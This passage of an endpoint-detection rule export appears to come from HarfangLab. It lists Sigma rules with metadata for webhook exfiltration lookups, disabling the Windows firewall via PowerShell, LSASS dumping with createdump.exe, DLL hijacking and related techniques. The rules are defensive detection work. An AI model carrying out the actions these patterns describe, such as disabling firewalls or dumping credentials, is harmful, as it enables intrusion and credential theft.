exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_webthreatdefense:\n ProcessCommandLine: '?:\\Windows\\system32\\svchost.exe -k WebThreatDefense -p -s webthreatdefsvc'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_trellix:\n # C:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe\n ProcessDescription: 'Trellix Adaptive Threat Protection Service'\n ProcessSigned: 'true'\n ProcessSignature: 'MUSARUBRA US LLC'\n\n exclusion_intellijidea:\n ProcessParentImage|endswith: '\\IntelliJ IDEA *\\bin\\idea64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'JetBrains s.r.o.'\n\n exclusion_nexthink:\n # C:\\Program Files\\Nexthink\\Collector\\Collector\\nxtsvc.exe\n ProcessOriginalFileName: 'nxtsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NEXThink S.A.'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n exclusion_docker:\n ProcessOriginalFileName: 'com.docker.backend.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Docker Inc'\n\n exclusion_zen_browser:\n ProcessOriginalFileName: 'zen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, OSCAR GONZALEZ MORENO'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86213fd2-3e42-47e8-b6ae-b6ab6da0c1ea",
"rule_name": "DNS Resolution of a Webhook Service",
"rule_description": "Detects a DNS resolution request of a webhook service such as webhook.site.\nThese services allow for automatic logging of the requests they receive and can be configured to reply custom responses.\nAttackers can use such services to exfiltrate stolen data stealthfully, or to host and deliver malicious payloads.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "864c4117-8c10-4947-a5c1-127c857ebf9c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084099Z",
"creation_date": "2026-03-23T11:45:34.084101Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084106Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/",
"https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web",
"https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
"https://attack.mitre.org/techniques/T1189/"
],
"name": "t1189_appinstaller_suspicious_url.yml",
"content": "title: Package Installed via AppInstaller from the Internet\nid: 864c4117-8c10-4947-a5c1-127c857ebf9c\ndescription: |\n Detects URL requests performed by AppInstaller in order to install a remote application.\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\n - https://attack.mitre.org/techniques/T1189/\ndate: 2023/12/28\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189.001\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessOriginalFileName: 'AppInstaller.exe'\n ProcessCommandLine|contains: '-ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca'\n\n exclusion_knownurl:\n RequestUrlHost:\n - 'download.mytobiidynavox.com' # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\n - 'windbg.download.prss.microsoft.com' # windbg.appinstaller\n - 'languagetool.org' # Languagetool.Packaging_0.5.3.5_x64.msixbundle\n - 'staticcdn.duckduckgo.com' # DuckDuckGo_0.61.5.0.msixbundle\n - 'keepersecurity.com'\n - 'data-edge.smartscreen.microsoft.com'\n - 'ping-edge.smartscreen.microsoft.com'\n - 'dl-edge.smartscreen.microsoft.com'\n - 'download.shapr3d.com'\n - 'cdn.files.community'\n - 'crl?.digicert.com'\n - 'cacerts.digicert.com'\n - 'ocsp.digicert.com'\n - 'ocsp.sectigo.com'\n - 'crl.comodoca.com'\n - 'ocsp.comodoca.com'\n - 'ocsp.globalsign.com'\n - 'ocsp.entrust.net'\n - 'crls.ssl.com'\n - 'ocsps.ssl.com'\n - 'oneocsp.microsoft.com'\n - 'ocsp.*.amazontrust.com'\n - 'cdn.flexibits.com'\n - 'www.microsoft.com'\n - 'crl.microsoft.com'\n - 'go.microsoft.com'\n - 'download.microsoft.com'\n - 'c.pki.goog'\n - 'o.ss2.us'\n - 'crl.certum.pl'\n - 'huddlysoftware.blob.core.windows.net' # https://support.huddly.com/what-domains-are-used-for-software-upgrades/\n - 'msixhero.net'\n - 'rsu.bmw.de'\n - '*.lencr.org'\n - 'appinstaller.xelion.com'\n - 'download.keepersecurity.com'\n - 'www.compositeurdigital.com'\n - 'dl.meraki.net'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "864c4117-8c10-4947-a5c1-127c857ebf9c",
"rule_name": "Package Installed via AppInstaller from the Internet",
"rule_description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n",
"rule_creation_date": "2023-12-28",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1189.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8667c4cc-362c-4054-a0ce-f7d2982de46a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607511Z",
"creation_date": "2026-03-23T11:45:34.607515Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607522Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties",
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
"https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1204_002_suspicious_folder_execution.yml",
"content": "title: Process Executed From a Suspicious Folder\nid: 8667c4cc-362c-4054-a0ce-f7d2982de46a\ndescription: |\n Detects execution of a process from a suspicious folder.\n Adversaries may try to write to the Windows directory in order to bypass security features. Some of the folders in this directory are writable without elevated privileges.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\n - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\n - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/07/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessImage|startswith:\n - '?:\\Windows\\Prefetch\\'\n - '?:\\Windows\\Tasks\\'\n - '?:\\Windows\\system32\\Tasks\\'\n - '?:\\Windows\\debug\\'\n - '?:\\Windows\\tracing\\'\n - '?:\\Windows\\help\\'\n - '?:\\Windows\\logs\\'\n - '?:\\Windows\\Fonts\\'\n - '?:\\Perflogs\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8667c4cc-362c-4054-a0ce-f7d2982de46a",
"rule_name": "Process Executed From a Suspicious Folder",
"rule_description": "Detects execution of a process from a suspicious folder.\nAdversaries may try to write to the Windows directory in order to bypass security features. Some of the folders in this directory are writable without elevated privileges.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "867512a0-7df8-460e-a3f5-0adf633ba816",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087014Z",
"creation_date": "2026-03-23T11:45:34.087016Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087020Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
"https://attack.mitre.org/techniques/T1562/004/"
],
"name": "t1562_004_powershell_disable_firewall.yml",
"content": "title: Windows Firewall Disabled via PowerShell in Command-line\nid: 867512a0-7df8-460e-a3f5-0adf633ba816\ndescription: |\n Detects PowerShell commandlets in command-line mode used to disable the Windows firewall.\n Attackers may disable the Windows firewall to gain unauthorized access to a system or network, bypass security measures and ease future access to compromised systems.\n It is recommended to analyze the context (parent process, ancestors) around this execution of PowerShell to determine whether the disabling for the firewall is the consequence of a legitimate IT policy or the result of malicious actions.\nreferences:\n - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n - https://attack.mitre.org/techniques/T1562/004/\ndate: 2021/05/07\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmd:\n CommandLine|contains|all:\n - 'Set-NetFirewallProfile'\n - '-Enabled'\n - 'false'\n\n selection_profile:\n CommandLine|contains:\n - '-All'\n - '-Profile'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "867512a0-7df8-460e-a3f5-0adf633ba816",
"rule_name": "Windows Firewall Disabled via PowerShell in Command-line",
"rule_description": "Detects PowerShell commandlets in command-line mode used to disable the Windows firewall.\nAttackers may disable the Windows firewall to gain unauthorized access to a system or network, bypass security measures and ease future access to compromised systems.\nIt is recommended to analyze the context (parent process, ancestors) around this execution of PowerShell to determine whether the disabling for the firewall is the consequence of a legitimate IT policy or the result of malicious actions.\n",
"rule_creation_date": "2021-05-07",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "867c41de-ac3a-4ccf-9f21-8c290e5f35b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086696Z",
"creation_date": "2026-03-23T11:45:34.086698Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086702Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_jabswitch.yml",
"content": "title: DLL Hijacking via jabswitch.exe\nid: 867c41de-ac3a-4ccf-9f21-8c290e5f35b1\ndescription: |\n Detects potential Windows DLL Hijacking via jabswitch.exe, which is part of the Java SE8 Runtime Environment.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate, signed third-party binary to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/01/08\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'jabswitch.exe'\n ImageLoaded|endswith:\n - '\\VERSION.dll'\n - '\\vcruntime140.dll'\n - '\\MSVCR100.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_image:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Java\\jre'\n - '?:\\Program Files (x86)\\Java\\jdk'\n - '?:\\Program Files\\Java\\jre'\n - '?:\\Program Files\\Java\\jdk'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows Software Compatibility Publisher'\n - 'Oracle America, Inc.'\n - 'Eclipse.org Foundation, Inc.'\n - 'Amazon.com Services LLC' # C:\\Program Files\\Amazon Corretto\\jdk1.8.0_422\\jre\\bin\\jabswitch.exe\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "867c41de-ac3a-4ccf-9f21-8c290e5f35b1",
"rule_name": "DLL Hijacking via jabswitch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via jabswitch.exe, which is part of the Java SE8 Runtime Environment.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate, signed third-party binary to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-01-08",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "869b436c-0aaf-41f9-aad5-edb0d72e4f92",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.571154Z",
"creation_date": "2026-03-23T11:45:34.618391Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618395Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/ShitSecure/status/1590655082864906240",
"https://strontic.github.io/xcyclopedia/library/createdump.exe-0464C3912C3B38C27F5DD2D64E09B0BF.html",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_process_memory_dump_with_createdump.yml",
"content": "title: Process Memory Dumped via createdump.exe\nid: 869b436c-0aaf-41f9-aad5-edb0d72e4f92\ndescription: |\n Detects a suspicious attempt to dump a process' memory using createdump.exe, the .NET Crash Dump Generator.\n This binary can be used as a LOLBin in order to dump the LSASS' process memory.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine materials stolen from memory.\nreferences:\n - https://twitter.com/ShitSecure/status/1590655082864906240\n - https://strontic.github.io/xcyclopedia/library/createdump.exe-0464C3912C3B38C27F5DD2D64E09B0BF.html\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/11/14\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CreateDump\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\createdump.exe'\n - Description: 'Microsoft .NET Runtime Crash Dump Generator'\n\n # Arguments are required\n selection_commandline:\n CommandLine|contains: ' '\n\n exclusion_squirreltemp:\n Image|endswith: '\\AppData\\Local\\\\*\\app-*\\createdump.exe'\n ParentImage|endswith: '\\AppData\\Local\\SquirrelTemp\\Update.exe'\n\n exclusion_kenora:\n Image|contains: '\\Kenora.GSST.Instrument.Client\\'\n\n exclusion_vistasoft:\n ParentImage: '?:\\Program Files\\Duerr\\VistaSoft\\Binaries\\Duerr.DigitalDiagnostics.Applications.VistaSoft.WorkstationService.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "869b436c-0aaf-41f9-aad5-edb0d72e4f92",
"rule_name": "Process Memory Dumped via createdump.exe",
"rule_description": "Detects a suspicious attempt to dump a process' memory using createdump.exe, the .NET Crash Dump Generator.\nThis binary can be used as a LOLBin in order to dump the LSASS' process memory.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine materials stolen from memory.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86b6d127-f438-4d94-8754-6dc95226d73d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617981Z",
"creation_date": "2026-03-23T11:45:34.617983Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617987Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/"
],
"name": "t1204_harfanglab_eicar_macos.yml",
"content": "title: Harfanglab EICAR (macOS)\nid: 86b6d127-f438-4d94-8754-6dc95226d73d\ndescription: |\n This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\n EICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\n This does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\n If this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\ndate: 2023/11/30\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Malware.EICAR\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains: 'EICAR-STANDARD-HARFANGLAB-TEST-STRING'\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86b6d127-f438-4d94-8754-6dc95226d73d",
"rule_name": "Harfanglab EICAR (macOS)",
"rule_description": "This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\nEICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\nThis does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\nIf this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86d4bfcf-b95a-4574-ae9a-bb54d1a857ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624357Z",
"creation_date": "2026-03-23T11:45:34.624359Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624363Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1027/004/"
],
"name": "t1027_004_suspicious_process_parent_csc.yml",
"content": "title: Suspicious parent process for .NET code compiler\nid: 86d4bfcf-b95a-4574-ae9a-bb54d1a857ec\ndescription: |\n Detects an uncommon process launching csc.exe or vbc.exe. These binaries are used to compile .NET code.\n Attackers may compile their payload directly on the compromised host to bypass defense mechanism.\n It is recommended to check the processes tree for suspicious execution after the compilation.\nreferences:\n - https://attack.mitre.org/techniques/T1027/004/\ndate: 2021/06/18\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Csc\n - classification.Windows.LOLBin.Vbc\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_process:\n - Image|endswith:\n - '\\csc.exe'\n - '\\vbc.exe'\n - OriginalFileName:\n - 'csc.exe'\n - 'vbc.exe'\n\n selection_parentimage:\n ParentImage|endswith:\n - '\\cmd.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\mshta.exe'\n - '\\wmic.exe'\n - '\\svchost.exe'\n - '\\rundll32.exe'\n - '\\regsvr32.exe'\n - '\\cmstp.exe'\n\n selection_powershell:\n ParentImage|endswith: '\\powershell.exe'\n\n # Avoid false positive when PowerShell use cmdlet Add-Type.\n selection_powershell_commandline:\n CommandLine|contains: ' /noconfig 